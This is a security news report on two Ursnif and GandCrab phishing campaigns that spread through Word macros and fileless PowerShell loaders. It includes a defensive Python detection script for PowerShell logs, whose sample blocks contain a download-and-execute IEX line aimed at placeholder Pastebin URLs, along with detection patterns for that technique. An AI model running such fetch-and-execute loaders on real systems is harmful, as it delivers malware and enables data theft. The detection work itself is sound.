Researchers have discovered two distinct malware campaigns, one of which distributes the Ursnif data-stealing trojan and the GandCrab ransomware in the wild, and the other of which infects victims only with the Ursnif malware.
Although the two campaigns appear to be the work of different cybercriminal groups, they share many similarities: each attack begins with a phishing email carrying a Microsoft Word attachment with malicious macros, and each then uses PowerShell to deliver fileless malware.
Ursnif is a data-stealing malware that typically harvests sensitive information from compromised computers, including banking credentials, browsing history, keystrokes, and system and process data, and it can also deploy additional backdoors.
GandCrab is a widespread ransomware threat that, like every other ransomware on the market, encrypts files on an infected system and requires victims to pay a ransom in digital currency to decrypt them. GandCrab was discovered early last year. Its developers prefer DASH payments, which are more difficult to track.
MS Word documents plus VBS macros equal Ursnif and GandCrab infection
Security researchers at Carbon Black, who uncovered the first campaign (the one distributing both threats), identified approximately 180 variants of MS Word documents targeting users with malicious VBS macros.
If successfully executed, the malicious VBS macro launches a PowerShell script that employs a series of techniques to download and execute Ursnif and GandCrab on the targeted systems.
The base64-encoded PowerShell script executes the subsequent infection stage, which is responsible for downloading the system-compromising malware payloads.
The initial payload is a PowerShell one-liner that evaluates the architecture of the targeted system and then downloads an additional payload from the Pastebin website. This additional payload is executed in memory, making it difficult for conventional anti-virus techniques to detect its activities.
This PowerShell script is a minimally modified version of the Empire Invoke-PSInject module, according to researchers at Carbon Black. “The script will take a base64-encoded embedded PE [Portable Executable] file and inject it into the current PowerShell process.”
The final payload then installs a variant of the GandCrab ransomware on the victim’s system, preventing access until a ransom is paid in digital currency.
The malware also downloads an Ursnif executable from a remote server, which, once executed, will fingerprint the system, monitor web browser traffic to collect data, and then send it to the command and control (C&C) server of the attackers.
“During this campaign, however, numerous Ursnif variants were hosted on the bevendbrec[.]com website. Carbon Black was able to identify approximately 120 distinct Ursnif variants hosted on the iscondisth[.]com and bevendbrec[.]com domains,” researchers stated.
MS Word documents plus VBS macros equal Ursnif data-stealing malware
Similarly, the second malware campaign discovered by security researchers at Cisco Talos utilizes a Microsoft Word document containing a malicious VBA macro to distribute an additional variant of the same Ursnif malware.
This malware attack compromises targeted systems in multiple stages, beginning with phishing emails, then executing malicious PowerShell commands to achieve fileless persistence, and finally downloading and installing the Ursnif malware, which steals sensitive data.
“The [PowerShell] command consists of three parts. The first section creates a function for decoding base64-encoded PowerShell. The second section generates an array of bytes containing a malicious DLL,” researchers from Talos explained.
“The third section executes the base64 decode function created in the first section, passing an encoded string as the function’s parameter. The returned decoded PowerShell is executed by the Invoke-Expression (iex) shorthand function.”
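Both PowerShell loaders described above (the Carbon Black one-liner that checks the architecture, fetches a stage from Pastebin and runs it in memory, and the three-part Talos command with its base64 decoder, embedded DLL byte array and iex call) leave a recognisable footprint in PowerShell script-block logging (event 4104). The following triage script is an added example written for this article, not code from Carbon Black or Talos; the script blocks it scans are constructed stand-ins with placeholder URLs, not the real campaign payloads.

```python
import re
from typing import Dict, List

# Constructed sample script blocks, shaped like what event 4104 would record.
# These are illustrative only: placeholder URLs, a fake MZ header and a junk
# base64 string stand in for the real campaign material.
SAMPLE_SCRIPT_BLOCKS = {
    "talos_style": (
        'function d($s){[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($s))}; '
        '[byte[]]$b = 0x4d,0x5a,0x90,0x00; '
        'iex (d "ZgB1AG4AYwB0AGkAbwBuAA==")'
    ),
    "cb_style": (
        '$u = if([IntPtr]::Size -eq 8){"https://pastebin.com/raw/EXAMPLE64"}'
        'else{"https://pastebin.com/raw/EXAMPLE32"}; '
        'IEX (New-Object Net.WebClient).DownloadString($u)'
    ),
    "benign": 'Get-ChildItem C:\\Users | Where-Object { $_.PSIsContainer } | Select-Object Name',
}

# Each indicator maps to one trait the article attributes to the loaders.
INDICATORS = {
    "base64_decode": re.compile(r"FromBase64String", re.I),          # Talos part 1
    "invoke_expression": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),  # Talos part 3
    "embedded_byte_array": re.compile(r"\[byte\[\]\]", re.I),        # Talos part 2 (DLL bytes)
    "arch_check": re.compile(r"\[IntPtr\]::Size|Is64BitOperatingSystem", re.I),  # CB one-liner
    "paste_site_download": re.compile(r"pastebin\.com", re.I),       # CB second stage host
    "in_memory_download": re.compile(r"DownloadString|DownloadData", re.I),  # fileless fetch
}


def score_script_block(text: str) -> List[str]:
    """Return the names of the indicators present in one logged script block."""
    return [name for name, pattern in INDICATORS.items() if pattern.search(text)]


def is_suspicious(text: str, min_hits: int = 2) -> bool:
    """Flag only when execution-from-string is combined with a staging indicator,
    so an ordinary iex in an admin script does not fire on its own."""
    hits = score_script_block(text)
    return "invoke_expression" in hits and len(hits) >= min_hits


def triage(blocks: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each flagged block name to the indicators that matched it."""
    return {name: score_script_block(t) for name, t in blocks.items() if is_suspicious(t)}


if __name__ == "__main__":
    for name, hits in triage(SAMPLE_SCRIPT_BLOCKS).items():
        print(f"{name}: {', '.join(hits)}")
```

The thresholds and regexes are deliberately loose; in production they would sit alongside the Talos IOC list rather than replace it.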
Once the malware is executed on the victim’s computer, it collects information from the system, stores it in CAB file format, and then transmits it to its command-and-control server over an HTTPS connection.
In their blog post, Talos researchers have provided a list of indicators of compromise (IOCs), as well as the names of payload files dropped on compromised machines, that can be used to detect and stop the Ursnif malware before it infects your network.